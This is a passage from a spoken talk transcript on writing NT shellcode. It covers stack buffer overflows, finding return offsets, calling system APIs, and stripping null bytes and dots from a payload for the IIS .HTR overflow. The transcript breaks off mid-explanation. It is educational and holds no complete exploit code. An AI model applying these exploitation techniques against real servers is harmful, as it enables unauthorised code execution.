 OK, thank you for joining us today. We are going to talk about how to write an NT shell code. We will start by explaining what the shell code is in general. And we will show you the C code that started it and how you convert it to some assembly language code that directly calls the system codes. And then we will show what kind of things you have to do to your code so you can use it as shell code. Can someone please remove that dog? It doesn't have to be permanent, so just someone go there. And we are not going to show a very sophisticated shell code, just some simple code that writes to some file. The background is that normally shell code doesn't have to be destructive. On UNIX it is very simple to make a small piece of code that will actually open a shell for you. And then you have complete access to the machine over the network connection. But on NT things are a little more difficult. You have to have a special DLL, Winsock DLL, to make socket calls at all. And piping is not so straightforward. Making system calls under NT is not so straightforward. So the general methods apply, though. So what we show today can be used to make more elaborate shell code, and that has been done. But it's quite long shell code that actually does open TCP connections or pipes, programs. So if you want that, you can find working code on the network. We will just show you what kind of transformations you have to do to get working shell code. The example we will be using is the iExploit that was on the net, I think a month ago, about the internet information server on NT, where you could use .HTR files and use overrider buffer in the name of the file. So that was the actual buffer overflow we exploited. And it was sufficient to show that you could run code we didn't have to open a shell. So the goal was not to actually get a shell on the machine, but just to show the client that you could run code on the machine. And we will be trying to use that beamer to show the slides. By the way, I'm Felix, and this is Earthquir. And he will be using the slides to talk to you now. OK. I'll give some introduction into, well, the question is, what is a buffer overflow and what is the exploit of it? And for this, we make an example, a short, small example under Linux, not NT, because most of the things apply to almost all operating systems. The concept is the same. So I show you something. We have this little piece of code when I find it. Actually, we will be using Intel Syntax for assembly language on our examples. So you can use it under Linux with N-ASM, but you don't have to. So we use this because when I wrote the code, I used my knowledge from MS-DOS days. So you can probably see from the code. Actually, this is the kind of function that can be exploited with buffer overflows. I hope you can read it. It's a small piece of C code. Better? Is it better? OK, we have a small piece of C code. There's nothing more than one buffer. It's called S, this line. And you can see we are copying the value of the environment variable foo into this static buffer. And the question is, what happens? What is going on there? We might expect that when the value of foo is small, something like 1 character or 1,000 characters, they won't happen anything we wouldn't expect. It will be copied into this buffer S. But now I'm prepared I compiled it already. So when I already set up the variable foo, oh, I didn't. Let's try now. Nothing happens. You might maybe you see what happened. Now we have this, which is quite long. I wrote 103 times the string 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 into this variable foo. So it's bigger than the buffer S. And so we have maybe some of us see such a line many times a day. OK, so we start to understand what is going on, actually. What is the segmentation fault here? For this, I have prepared a assembler output of the compiler, not the compilation in binary form, but I use GCC. Oops, what's that? Anyway, we have here a prepared version of it. So this is an assembly. And the important part is here. This is the main function, the function where the program actually starts to be executed. And those three lines are called, it's standard code written in almost every program from the compiler. It's called, how do you say, setting up a stack frame. So actually what happens is that on the stack, you see the first line, we put the base pointer onto the stack to mark where our code will begin. The third line, which is the most important line, there is an allocation of space on the stack for our variable S, the buffer. So what we can see now is we have imagination how the stack is looking like. Well, some of the words maybe are not so familiar to some of you. You need, well, I will not explain what the stack is actually. Do you want to explain? OK. We don't want to scare you away, but this is going to be mostly assembly language. The examples we will be showing you. So if you haven't seen this before, this is full of legacy. The whole Intel architecture is full of legacy anyway. So oh, I'm not the first in this room. The stack is quite all the concept of computers. What happens is that the memory physically is just a large block that can be addressed at any point. And if you load the program into memory, the code is loaded and some location that is dynamic on some systems that's static on others. Anyway, this is static code from the program file. Then you have some data that can be dynamically allocated by the program itself. And you have another type of memory that can be allocated dynamically by the program. The idea is that you don't write the whole program in one piece, but you write procedures. So you separate the different ideas in the program in procedures. And when you call a procedure, the procedure has to know where to jump back. It has to know who called the procedure so it can continue execution when it's done at the point from where you called it. So we have to record the location from which we were called at some point. And we do this on the stack. This organization. You can see it on the picture. This is where return address is. The whole rectangle there is the stack for the current program. And on the bottom you see the point to the environment variables, the pointer to the arguments, the integer which says how many arguments we have, and then the return address. This is on the stack. Then we have this you sort in the piece of assembly code starts there. We push the data which was in the base pointer before. This is above of the return address. And then we allocate space for the buffer S we had in the SQL. Maybe I should show you the name. So we need a location to remember from where we were called. And this location is not known inside the procedure. So if we call some piece of other code which might actually be part of the system library or the operating system itself. What we do is first we push the address where we want the procedure to continue when it's done on the stack. Then we call the procedure. And the procedure when it's done gets this value from the stack and returns there, jumps there. So what happens if this procedure calls another procedure that has to be put on the stack again so the address is not static? Pushing something on the stack means writing it here, for example, and then incrementing the stack pointer to the next address. So the operation that can be done on the stack is just pushing values on it and then removing the values again. When a procedure needs more memory than what you passed it, dynamic memory that will no longer be needed when the procedure is done. You can put that on the stack too as happened to the buffer here used in this example. So you don't have to put the data on the stack in just bytes or words, but you can also allocate larger amounts of stack like this buffer. The stack grows upwards. That means if you put data on the stack behind that data is the address where the procedure wants to continue execution when it's done. So when we use a local variable like the buffer as you used in the example, and you write something there that's longer than the space that was allocated for it, you overwrite this value, the return address. OK, we show it in this example what he explained. So you saw maybe. Actually, this is not always the case that the stack grows upwards. There are some historical examples for architectures where the stack grows downwards. And all recent architectures do grow this way. So this is not only Intel machines, but also most other machines, but it is not. You don't have to do it like this. And of course, if the stack grows in the other direction, it's much more difficult to overwrite the return address. OK, let's take a look on it. The code makes just a simple copy of the environment variable foo into the buffer s. That means in this stack case, the copying will start at minus 1,024, looking from the base pointer. And the value of foo will start copying there and moving down there. And if it's too large, it will overwrite the base pointer and the return address. And this is something we are going to look through some glasses. It's called the debugger. Actually, one important thing to notice on this point is that after you overwrite this return address, it's gone. This is the reason why exploiting a buffer overflow most of the time means that the program you're exploiting is ending then, because you don't know where to continue. And this means in the ISS case, we will be showing later that the process will either crash by itself or we will end it the natural way, which leaves less traces. So this is what's happening most of the time in exploits. Let's take a look. I put a breakpoint in the main function. So we can see actually what addresses are used. As you can see, the stack frame here doesn't have any absolute addresses there. You can't see them. We just know relative structure of the stack. We don't know the actual location in memory. So now we see some address there. The main function starts at the address 08048539. So we are at the main function now. And we take a look at the disassembly. We don't expect any difference to what we had before in the assembly. It's just now we will have the addresses too. You see here, maybe you remember those three lines. Those are the lines for the stack frame. And this is the buffer size we used for our variable. So we saw already what happens when we used our variable foo, which was 1,030 bytes long. And we just want to know what happens at this point, return, as Felix said. When we overwrite the return address here, which was set from the calling function of our function, we are maybe ending somewhere. Who knows? Let's take a look. Actually, this is the point where the program crashes most of the time because the addressable memory is much larger than the actual memory in most machines. So even if you have much memory, the program will usually be allocated just a few kilobytes, maybe megabytes. But if you jump to a random address somewhere, it will probably not be map memory. And the operating system will notice. OK, I set a breakpoint at the return where the return happens. And now we continue to there. And we want to see what the next step is. As you can see, there is some, well, maybe you can't read it, but the debugger tries to tell me that there's something strange. There's an address pointing to the unknown function for the debugger. And if I just continue, what happens is that the return address will be used, the code at that position, whatever was available on the return address, on the stack, whatever there was, this will be called. And maybe you can see those four bytes. Those are digits. Those are the ASCII version of 9 and 8, which is a part of our variable foo. So we overwrote the return address with the part of our variable. So the question, the natural question is now, can we put something into the variable foo on a special position where we don't have this garbage here because there's no function at that position. That's why we have a segmentation fault here. But the function we can choose freely, something like, I don't know, maybe write. And this is how exploit works, actually. The usage of a special, you create a special string, for example, in the variable foo, where at the special position, you put the address where you definitely know there is a function available I want to use now. So instead of returning, we will jump from here directly to the function of your choice. This means, one thing you should have noticed, that we overwrote the data part of the number. This is actually surprising because one would think that machines store numbers as you write them on paper, storing them the highest digits first in memory. But this is not the case on Intel machines. And most modern CPUs actually can switch this. So you can tell the CPU, the operating system can tell the CPU which mode to use. Actually, big Indian is much of the norm on different Unix systems, but on Intel CPUs, you cannot switch this. So MS-DOS and Windows can only use the little Indian mode, which is default on Intel. Most other architectures and operating systems use big Indian, PowerPC, MIPS, most of the other things use this. Actually, Alpha is a case where it depends on the operating system which mode is used. Linux on Alpha is quite an old port of Linux, so they decided to emulate the Intel ways and use little Indian. But now Linux has moved farther than that and can actually run both ways, but it's still using little Indian. So the only CPUs you will ever meet probably that use little Indian mode in memory are those two. And that means if we overwrite the first byte in memory of the address, we actually overwrite from the written form the last bytes. And you might have noticed the 0 to 0s here at this point, which is the marker of end of string in C. So what we actually exploit here is not a lazy programmer, but a C function of the standard C library that is written in a way defined in a way that is not easy to use in a way to limit such exploits because you can tell this function how much space you have reserved. So there will always be a way unless you check manually beforehand to write more data than you have allocated. OK. This example, we won't go much farther here. We don't want to write the shell code exploit for Linux, not for this program. But I guess maybe you have the idea what is going on there, what the buffer overflow actually is, and how to exploit it. We now switch to the more important stuff, the anti-exploit. It doesn't matter. There are a few typos here, and it's not just 10 minutes old, so. What you will need is a computer and the software, which is known to be broken to have a buffer overflow. You need both parts to test something. And you need some tools. Oh, I forgot the compiler. Maybe you need the compiler too. You need a debugger, as in our case, because you have to check out the stack, the registers of the CPU. Those are important information for you. Those are the essential information for you. And you need a macro sampler. Sorry. OK, some other aspects are you need the header files of your operating system. In our case, it's the NT API for calling, for example, how to write the file on disk, something like that. You need the information, what parameters are expected by this function. Well, and the last point is you need some skills. This is some knowledge in assembly programming. And well, it pays knowledge of how the CPU works, how your architecture works. How many registers are there? What are they used for? This is basic knowledge. You can learn it by yourself. I guess it depends on you. Maybe between five minutes and 20 days, something there. The average is three. We actually suggest that you use Linux for testing buffer overflows, because on NT, many system calls are not checking the parameters properly. So you might actually crash the whole system by accident. So you should use Linux. And the software we list here, actually, this is a type of softice is written like the ice cream. Some individual uploaded it on our FTP server in case you needed this commercial software. So if you really use it, you should, of course, buy it. You can also use the, for example, under Windows NT, you can use the Microsoft C++ debugger, which comes with Microsoft. This should be sufficient for most cases. It's not that comfortable, like softice, but sufficient. So how should we go about on getting code to put in this buffer if we write a small program like Hello World and compile it with the Microsoft C++ compiler? We get a binary that's much larger than the buffer we trying to overflow. So we need to get small code and programs that you compile with standard compilers. Normally use the standard library of that compiler, which is normally a few hundred kilobytes large, which is probably also linked in the program that you are exploiting. But you can't be sure if someone is using some obscure language, or if the different version of the C library is used on the machine that you are trying to exploit. And so we need to get code that is both small and not using any libraries that may not be on the system or may be in a different language, different version, whatever. OK. The example now is about the IIS bug, which was found by I. I don't know how they are called. EI. OK, EI. Months ago, which was almost like this, I explained it on the board. If you used your favorite browser, well, actually, your browser cannot handle those addresses. But what happened was if you connect to the ISS and send in URL, which is quite long and has the HDR ending, ISS would immediately fall. Well, there are some conditions. It must be version four under an English system. We couldn't make it work on German systems. That doesn't mean the exploit doesn't work on German systems. But the system libraries are in a different language. That means some error messages may be longer, taking more or less space. That means the code that comes behind those messages moves a little. And as we will show on NT, it's quite difficult to do system calls because what you do is actually jump in the kernel. And you get the offset because the system component that loads program patches those offsets for you. So under more sane systems like Linux, you do a system interrupt. That means you have a global table of system routines, addresses, so the program can actually have position independent code. The code works wherever the code is mapped, which is actually what you want because loading a program does not need the overhead then to patch up those offsets. So under NT, what you do is you write an offset in your file. You just do a jump or call into operating system space. And the linker then does not really fix up those offsets, but leaves a list of offsets that still have to be patched when the program is loaded at load time. And the operating system then puts these offsets there, which of course leaves the problem that our exploit code needs those offsets too if you want to make system calls. And a system call is something like open a file, write data into a file, run an external program, stuff like that. So everything that actually does something needs to run system calls. That's why we would tell you it's easier to learn how to make buffer overflows work under Linux because you don't have that kind of crap on your hands then. OK, maybe this was a bit too fast. We make it step by step. The first thing you need is some kind of orientation. What do you have? So what you try is you create a buffer overflow with the program, and maybe use a nice pattern to recognize. As you remember, we use the debugger to watch what our code makes actually with the data we send. So he closed the program. We do it on the screen. Not really. Anyway, this sucks. We need to put it. So the problem is we don't actually know at this point if there are any variables besides that buffer on the stack. And if the calling convention actually does this, most compilers have an optimization that you can enable that leaves the stack pointer out so it doesn't save this register on the stack. So what we don't really know is how much more data after the buffer we have to override to get this address. And because we don't know on which address the stack is and on which part of the stack we are, we don't know the offset that we have to write here to get to our code. So to get our code to the system, there's only one position where the code can actually be. This is inside this buffer. So the idea of the exploit would be to write into this position an address in this part where our code begins that we uploaded. And then the procedure would return, would get the wrong value, and execute the code we wrote there. Just to make another picture about what Phoenix said, if this is the position where the stack pointer is. Well, this is a special case for the other example. We had the knowledge about the program because we've wrote it. We already know how big the buffer will be. But in general, for example, in the IIS exploit, we don't have such information. So we need the information, for example, you know here this is 1,024 bytes. But in general, how far are we away from the stack pointer? How much code we have to put in to override the stack pointer? So we need a technique to find out, let us say, our code will be start here and move down. We need this distance. And how do we get this information? And there's a quite easy technique to get the information. You write a special pattern as your overflow code, just a special, you remember the 0,1,2,4,5,6,7,8,9 in the previous example. And you could see which digits will be left at the returners on the stack. But this is not enough information because the blocks 0,1,2, and so on are repeating. So we don't know which block it is. The idea is to take a, I just show one pattern. How many of you are reading backtrack mailing list statistics? OK, most of you. So if you have seen buffer overflow, it's in the last month or so people are not actually posting exploit code, but they put lots of A's in the buffer. And the reason for this is that when the program crashes and you have a debugger loaded on your system, or you get the core dump and you can examine it under Linux or Unix with your favorite debugger, you get a register dump. So you see when the program crashed what data was on the registers. And this is important because the program crashes does not mean that you actually overwrote a buffer. It could be some other bug. Or it could be that you overwrote not some values on the stack, but it's on the heap. And the program crashed because some other problems. So this is done because if you see in the register dump that one register has lots of A's in it, which is 4,1,4,1, 4,1,4,1, then you know that this register was loaded from the memory you overwrote. So that's why you use lots of A's. You could do lots of other patterns too, but this has become the standard now. So if you find a buffer overflow, do it with A's too. Yeah, the A's are important to give you the information. You are on the right way. You can make an overflow there, most probably. The other one is I have a small program which generates a nice patterns. Just give it a number. Maybe we take some more. Then you will see the patterns better for those who are interested in what. Well, maybe you see some structure there. That's the way how the patterns are generated. You start with the small z. That's the code. Well, the only important information is this pattern with this pattern, if you try to make an overflow with it, you will have immediately the information where in your pattern your overwriting process occurred. One more information you need. I told you that you can put more than one word on the stack. There's one more thing. Most CPUs are more efficient if you align your data. And most risk CPUs only allow access to aligned data. That means you can only access data that are on a d-word boundary that the offset is dividable by four or the word length. And that means that if we pop a value on the stack, we always, if we push a value on a stack, we always push at least four bytes on Intel and on alpha, of course, eight bytes. So what we need here is a pattern that allows us to see which offset we need, which part of the overwritten memory actually is the return address. So the idea is to just put different words on the stack. We overwrite this with a regular pattern that allows us, if we examine the core dump or the debugger register dump, we can see which value was returned to. And then you can simply calculate which value it was. It was in your generated pattern. So this is just an example, which is easy to see, because then we immediately know it must be this one. Yes, and now we have the distance from the beginning to the end, well, in that case, from the opposite. So we have information where in memory we are the offset. And then we know how much code we actually can create. That's the other information. So actually, this pattern has some other nice property that you want, because it's a web browser. Not all characters are legal. So you can, for example, put 0 bytes in a URL. So this pattern is only normal characters. That means most buffer overflows will not alter that pattern. When creating code, we will see why this is important. But in this case, you need a pattern that, for example, does not contain zeros. Well, this is a bit nonsense there. The important stuff was said by Felix. You may see in that, well, you tried, you found the overflow. You take a nice pattern and you see where you are in memory. So the next step is to make more out of this information. And as he said, there may be some other constraints, like in the ISS, you are not allowed to send dots. Because in the URL, you remember, if you would use a dot, well, here, those are 1,024 characters. And if you would have a dot in between, then the ISS would recognize the rest of it as an ending and would not overflow anymore. Because he needs the HDR there. So that means you have some constraints. Your code must fulfill some requirements. So because it's easier to see how to get something done in Linux, we will use that example. There's not only code that is loaded from this, but there are some other static data, like example. For example, the command line arguments are somewhere in the memory range, too, because you can read them in the environment variables. So something you can quite easily guess is the position of the environment variables that are there. Because when the program is loaded and you didn't change the environment, you have the same environment that the other program will see. So what you can do is calculate, you put something in an environment variable, and you can see the position relative to the starting of the program. And then you can guess where this same environment variable will be for the other program. And this will, of course, still depend on the environment and whatever, but to get something done, you have an address that you can guess that is most likely static and the same on the other program. So as I told you, you have to patch that return address and you don't know where you are. But there's some other space where you could have put code. So one trick that is most often done when you are experimenting with buffer overflows in the beginning is that you actually put a value in the environment that contains code. And then you calculate the address of this and overwrite the return address with that value. And then you have given the program code to execute. And with some tricks, then you can find out which part of the program you overflowed. And actually, there have been buffer overflows not over the network, but local on Zolares, for example. There's one example that I can recall now where this would actually suffice because you overwrote some code that used the environment and you could get both flies with one clap. So this is one way to get the code there. But on the other hand, if we can put any value here, we don't need arbitrary code at the other side. It's sufficient to have code that will jump back to where it came from. And the fun part is that when the buffer is overwritten, you normally use registers of the CPU to point to the addresses that you're copying. So one of the registers on Intel, it's mostly the EDI register contains a pointer that is in the vicinity of the code that you just overwrote. So you need not arbitrary code where you can jump to, but code that will use this register and jump there. This doesn't mean that you have to put that code somewhere, but you have to find some place in some system library where there is some code that actually does this, that uses this register and jumps there. And this is just the way that was used on NT. We'll come to that later. Oh, there are other tricks, by the way. You don't have to know exactly where you want to go to to give you an idea of how big a shell code is in the end. The one that we have been writing here was something like 130 bytes. So you have lots of spare space. What you can also do is just guess where the code will be. And you have all the time of your life to test it if it's a local program. So you can just run the program and guess 15 S address. And then you just increment the address you are trying by the size of the buffer. And eventually, it will return to some place in the buffer. And you can, of course, write code that does nothing. So what you do is actually you fill the buffer with lots of code that does nothing. And in the end, there's your shell code. Then you don't have to try all the possible values, but you have just to come near. So it speeds things up greatly. So we now assume that we have a way to jump in the shell code. But that's not all. We can place arbitrary code there. Depending on the program we are exploiting, we have additional constraints. The most common constraint is no 0 bytes. Because the most commonly exploited functions are string functions from C language. And then you just have to write code that doesn't contain zeros. This is a layer below what most programmers ever see. So the most close to the machine people come usually is to see the assembler dump. But you don't know if the code you wrote contains zeros or not. And this is even more a problem if you use relative addressing. In our example, we are going to write to a file. So we have to have the file name in memory. And it's just part of the shell code. So one second. So what we do is we try to calculate our position. We try to find out our position. We will show you the trick used to do that in a few minutes. And then you have to do relative addressing. So you have to add the offset of the starting of your code to the message that contains the file name. This is a simple calculation, but on most machines you can't add just one byte values, but you can only add longer values. And longer values means that it's padded with zeros in the beginning. And you can't use zeros. So you have lots of tricks. And that is the part that makes shell code writing a little tricky. It's not actually difficult. We hope you will get the impression later. Did you have a question? Or we'll just join your name. Your question. Okay. What we have now is just to recollect everything. We have some information about the memory layout. We know something about where we will be with our code and memory. And now we start to think about what kind of code we want to. One question. Because you put the code there, you know it's the code you uploaded. You overwrite a large buffer. And you know that this distance is the same because you upload all the bytes in between two. So if you upload 10 bytes, you know that the distance between the first and the last one is 10. So if you upload two kilobytes, you know that the distance is in between our constant no matter where your code actually starts. Yeah. The point is maybe just to make, maybe the question was the whole picture there maybe change in memory by every time you run. You know, you run the program and then you have a starting point for the return address is somewhere and the next time it's somewhere different. But relative in your program, all the buffers you use are always the same relative to the memory layout for your program is the same if you use static buffers. Actually most compilers nowadays allow you to create position independent code because if you have a shared library, most of you have seen this probably, shared library, you want to load the code into memory and don't want to fiddle with it. If you don't have position independent code, you have to add, go through the code, find all the pointers to some other place in the same code and add the starting address of where you loaded the library in memory. So this is obviously not something you want to do and most CPUs allow you to do position independent code but it's not something that you can learn from reading assembly language books normally. So the idea is to write code that works no matter where it is loaded and initially the first step is to find out where the starting part is. Highly secure password security here. Okay, I have to move the mouse a bit. Okay, so maybe just to complete this one. It may be that the offset you have recognized, the amount of space that is available for your shell code, maybe only 20 bytes. So you won't start to write an exploit which starts, for example, the email session or something like that because you don't have enough memory to write it. So the choice of code depends, for example, depends on the amount of space which is available. It also depends about your knowledge of the system. For example, do you want to write the file? Do you know how to write the file on that system? This information can be made available. For example, if you simply write a program on that system, adjust the user program which writes a file and you debug it and you get out the information about the offsets of those functions which are called. Yeah, you just write the piece. You create all the structures maybe you need, all the parameters you need for the function and you simply call the function in the favorite C compile. For example, under in T, use the Microsoft C++ compiler, the environment, write three lines of code, writing some file somewhere and then start debugging it and you will immediately see what happens with this program, which functions are called and then you have offsets available. So to get the shell code, we write some code in C first to see what the compiler makes out of this code. As I told you, we want to open the file and write something to the file, to demonstrate to the man who owns the machine that you can write to his machine. You can run code on his machine. So the obvious thing to do for C programmer was to be call fopen and if you compile this code and use a debugger to see what fopen actually does, you will see that it's just a wrapper for the open function and open isn't on a wrapper for a system call. So that's the reason why nowadays programs are so slow because you can't do anything directly. All you do is call wrappers that call wrappers and so on. So what we want to do is we cannot call fopen because it is part of the system library and we don't want to depend on that and we don't want to call open because it is part of the system library. So we can use a debugger and see what open actually does and what we will see is something like, sorry. So this would be the assembler code that actually does the system call. What it does is push some register on the stack. Normally operating system use the registers to get their arguments to the system and then they call the system and this is one of the ways to call the system and it's one of the good ways because you don't have to know actually where this code rests that does what it should do. So this instruction is completely independent of where the code is that does the system call. Linux does it this way. So what you have to do to get the effect that you initially wanted is two assembler instructions which is something like five bytes. The open wrapper is something like 50 bytes. The F open wrapper has to initialize the file structure and it's like 500 bytes and the code that does directly what you wanted in the first place is like five bytes. That is why assembly programs written by people directly in assembly language are normally very small and faster because this is overhead you don't actually need. So it's more comfortable for the programmer to use these wrappers because you don't have to remember how your system implements the system call but for shell code you want to do this way. So you use the debugger to step into the functions you need and then you will see this interrupt is used every time for system calls. So how is the system supposed to know that you want to open a file? The idea is to put in some register some code that is defined in some header file that tells the system what you actually want. So what you do is you put in this register you put what you want to do with the system and you of course you have to put these arguments like the name of the file you want to create you have to tell the system two and this is normally done, this is a string that doesn't fit in one register. Registers are only integers. So you can put numbers in there or pointers to memory locations but not strings. So what you do is you put the offset so the address of the string. This would be an example string. It's somewhere in memory and you know when you write the program you know the offset of this character, the address. You put this address, this ended with a new zero byte to show the system that the string ends there. But you don't see this normally a C programmer but you know it if you do some string manipulation. But the Linux kernel is written in C2 as are most Linux and Unix and free BSD variants. So this is a convention that's normally used on other systems too even NT uses zero-terminated strings. And so you put this address in a register and call this function call and the system has to tell you if the function call succeeded or not. So what happens is that the register EAX contains a zero or an error code. And this is quite low level so you don't actually want to do this because this will only work on Linux in the end. It's not portable. That's why we don't use code like this. Normally it's small, it's fast, it does what we want but it's tedious to write and it's not portable in the end. But with a debugger you can get these magic incantations you need to tell the system to open a file. And you will see that for example this offset can contain zero bytes too. So if you construct a code that opens a file and writes something to that file and closes the file and then exits the program that you have lots of zeros in your code. And you get some other problems like this is how system calls work on NT. You call the system directly. Most people use the latest version of NT normally. So this offset is fixed because they all have the same operating system installed. Of course the next service pack made might change this address. So that's why exploits sometimes work on this machine but not on the other one which looks the same but if you install MS Office you know that it will overwrite half of your system and these are some of the effects that might be not beneficial in this case. So we have lots of problems that are not obvious in the first place. Like this call calls on Intel architecture are relative calls always. So this will be coded in few bytes in memory. The first one is the call instruction tells the CPU that you want to call something but if you do two calls to the same address you get two different strings because you don't encode the address but you encode the difference between where you are right now and that address. So this is tricky because if you insert some code above this difference might change so as to include one zero that wasn't there before. That's the kind of trouble you have when you construct shell code and you don't have this on Linux that's why we say you should use this method and try your stuff on Linux and then you can port it to Intel later. Okay, just bottom line to the information we have now. The point is what we want to do in our code. Yeah. Is we want to execute something and we have, we need parameters for this and we need the function. And as we learned different systems have a different kind of function handling. So we have the difference between Linux for example using the interrupt method and NT using the call method. But whatever method is used you can check it out using a debugger for example just write a simple piece of C code and use the debugger follow each step and you will see what actually happens. Either in NT case for example you will see the calls. It may be some more complicated because the function you see will maybe call another function and this will be calling a different function but somewhere there is the essential function you maybe want to use. Actually I would recommend that you buy some book from the manufacturer of your CPU and read it end to end to get all the tiny details that make your life harder in the end if you don't know them. For example, this is protected mode what 32 bit protected mode that you use nowadays but in DOS you use 16 bit code and then there's another version of call that can actually call a fixed address not only relative ones. But the programmer doesn't see all this this is a detail of the CPU and you see this if you get a book about Intel instruction set from your favorite bookstore or you get the N-Azm assembler which contains a manual that contains information about Intel instructions. But in the case of the ISS exploit we actually did it the other way. We wrote a small piece of C code and followed because we didn't know where NT has a low level function for writing a file. We had some C++ function in some library somewhere but we wanted a actually low level function because this is most probably available on each NT machine. So and we followed. The first thing we have to do is apologize because this was done a few seconds before we started here because we considered it a good thing to show you the initial code. So this was back translated from the later code and of course what we mean here in this place is we want to write HTML code. So this was actually not an underscore but another character. I forgot to translate that but it's not so important. What you see here is the code that you get if you reverse engineer what your operating system wrap us to in the end and these goofy constants like these goofy constants that we push on the stack here zero, one, 28. Those are constants from the Win32 API that say you want to open the file in sharing mode and you want to create it if it's not there and stuff like that. Well, you have to read it the opposite way. You see the call function, the first one where it was open written on the right side. This is the function call and what we do on top of it is we put the parameters on the stack. This is the way how NT wants to see the parameters of the function. Other different systems make it differently but in that case we just, well, we don't know what the parameters mean actually. No, we do know but this is explained in the Win32 API. One thing you might have noticed is that the order in which we push those on the stack is contrary to the API definition is the other way around than what the parameters look to a C programmer. This is because of the NT calling convention that states that you have to put the arguments the wrong way on the stack. This is documented in a manual somewhere or you just have to know stuff like that. You can see this if you read the code that your compiler creates and then you can get stuff like that or this is documented in manuals about writing assembly language for Windows. I know that there are not many manuals, almost none that explain how to do assembly language on Windows but a few of them are there and you should try to get hold of one of them to help you while experimenting. So what we do is we push some constants on the stack and then we call the operating system and this offset, the static offset is static on most NT systems but if someone installs service pack six or win 2000, better, whatever this offset will be something else. So if you want to write really good share code we would add code that tries to find this offset by looking at adjacent places and looking for the code but as far as I know no one actually did that because you are happy when it works on your system so that you can put a message to bug track and be famous. So we have to open the file as I said and then we have to write something to the file then we have to close the file. Actually closing the file is not that important but on some systems when you don't close the file you cannot be sure that the data is actually written to the file. So we do it here because we want to be a good example for you, you should always close your files and the last thing we do is tell NT to exit the current process. If we just wrote nothing there, the CPU would try to interpret the HTML code as instructions and would do something completely bullshit and then crash and burn and you would probably see in the event log of the NT system that the IIS process crashed and this looks like a bug or maybe you could suspect that someone tried to break into your server but it's something that's visible. Someone tried to write in shell code some time ago that would actually in the end run a process that would run the one you just crashed a few seconds later so that actually nothing happened except some outage for a few seconds on the system but there's no documented shell code that actually does this so we leave this as exercise to the audience. Okay, this code is the assembly version of a working piece of code which would create a file. If we assembly this, have the binary form of it we would recognize some things which are contrary to the requirements. For example, all those push zeros. So these are the obvious places. Yeah, this is something we understand because this is straightforward. This is assembly straightforward to create a file on NT. And obviously if you push a zero you get zeros in your code so you don't want that. The binary zero in your shell code though that would mean we cannot put it into our URL. Oh, one thing, one other thing. You see here that we push the offset of string or the offset of message but I told you before we don't know actually the position of our code. So one thing that should be conceptually clear now is that we have to find a way to know where we are now. And as I told you all calls are relative on Intel. So what you would do in this case if you call the procedure I told you the current position after the call is put on the stack. So what you would do is this code. We just call the position right after the call which puts the offset of this piece of code on the stack and then we get it back with POP. So this is obvious code how to get the current offset but as I told you this call puts this offset on the stack and this location will be encoded as the difference and the difference is zero so we have another zero which is less obvious but this is the kind of problem that you will encounter when you write child code all the time so you might as well keep this in mind now. And you can also see in the first message line you see there are some strings and you see those www code law where there are not dots in the first place there should be some dots there but they are not allowed in the if you want to have a successful child code there they are not allowed. So why are these not allowed? Because we exploit the filename part of filename.htr that means HTTP requests look like this. This request will return will work like this. You connect to foo the machine foo port 80 and then you say and some other crap. So what happens is this part has to be our buffer because the extension is counted from the first dot. This is some IIS specifics of course. This is something that does not happen with all overflow exploits but this is something that has to be done for each buffer you want to overflow and to be honest we didn't realize it at first because what you do is just write code and put it in the buffer and then you see it doesn't work doesn't even trigger the code overflow because what IIS does if you say if you have a dot in here then the first characters after the first dot will be the extension and this will probably not be dot HDR. So you have to avoid periods in the share code too and periods can of course happen not only in the binary code from assembled instructions but again in offsets. So one obvious thing if you want to get zero on the stack like push zero pretend that we have only four digits in each number now because I'm tired of writing all this. So this is an obvious way to get zero in EIX and then we simply push it. This code is equivalent to the original push zero but it doesn't contain any zeros. So these are the kind of things we will do to the code to get rid of zeros and not only zeros but end of line is probability two dots as I said and we noted a few other things we will explain later. Yeah you have to start to apply a few tricks on your code. But these are not conceptual hurdles. No, the working code is, you can see it there but now you have to start to make some reps to avoid zeros to avoid dots and all the stuff and this can be quite time consuming because you have to test it always. So in case we intimidate you and you think we are wizards it took us a few hours to convert this code into a form that does not contain any zeros and something like 200 tries. So the problem is that it's easy to shoot yourself in the food on the way because if you do something to change your code and you, before that code that you just changed you calculated the distance to some of the message that is stored in the end of the code and you inserted by here you might accidentally create a zero or a line end or dot just in the offset the difference. So even if you, the transformation you just did was right you might as well put in another zero and this is quite difficult to find because all the feedback you get is that the server process crashed but didn't write the file. So this is, conceptually what you have to understand is only how to get this code that's on the screen now. The rest is just fiddling with the bits to get the zeros out. Okay, okay and the hard work and 200 tries of exploit is seen here. Actually one thing that is very good for finding problems is just a second, excuse me just to make this one clear this is the conceptually exactly the same code as before it's a bit longer because all of the tricks we used but it's the same code makes the same thing. So the first thing that you see is the commented out in three. This is another thing of the entire architecture because this is historically the debugger interrupt. So if a debugger wants to insert a breakpoint it used to write in three there and the internet process has a special instruction so that in three can be encoded in just one byte for this purpose. Nowadays you don't do that because you have hardware breakpoints with special registers but debugger still listen to interrupt three. So if you have code that starts with in three the debugger will open up will pop up once you do the exploit. This is quite funny actually because you have to imagine me sitting on my anti-server box and it triggers something on my machine I haven't touched anything and the debugger just pops up because he uploaded some code to my machine. I put this code in binary form uploaded and because of the in three he can follow with the debugger which suddenly pops up what is going on and maybe there's some missing zero we produced after the last trick and so on and this is going over 200 times taking something like five minutes each round. So as I told you we have the problem with this call that it is zero. The most obvious thing to do would be to insert one instruction here and it's no longer zero but this knob instruction means do nothing and it's two bytes long. That mean it can be encoded as one byte that's what most assemblers do. So what happens the offset would be one but call uses a four byte offset so what we actually have is not one but so we haven't gained anything. One trick is that negative numbers are stored as lots of zeros. So what we do is we jump to temp two which is two lines below that, jump back and then call. So then the offset of the call will be negative and we get the same result. So this is the kind of code that you will see in child codes it's not obvious what it does but once you know the tricks it's all the same all the time. Make it jump there and then you can, we can make a picture. How does it work? Okay, we have it. We are somewhere in the code and the forward means that direction and we jump just one back so we have the offset here which is given a negative form and this is just the FFFF starting. So in binary form. So we did the same call to get it but we had to insert some garbage that really makes the code hard to read in the end and it more than doubles the code size. So now we have the offset. The next thing is that as I told you the differences between the relative differences between the code and the messages for example the file name will be a small number because the shell code is small so we have lots of initial zeros again. One trick to avoid that is that we use a number like this and add it to the offset we just calculated and when we use the number we just subtract the same magic again and in this way we don't have zeros in the code but we will have constants that contain no zeros but this of course makes the code very hard to read so that's why oh I have to excuse the comments that are in German of course but they're not so important we will tell you now. The next thing is we push zero I told you how we do it the first thing we do is 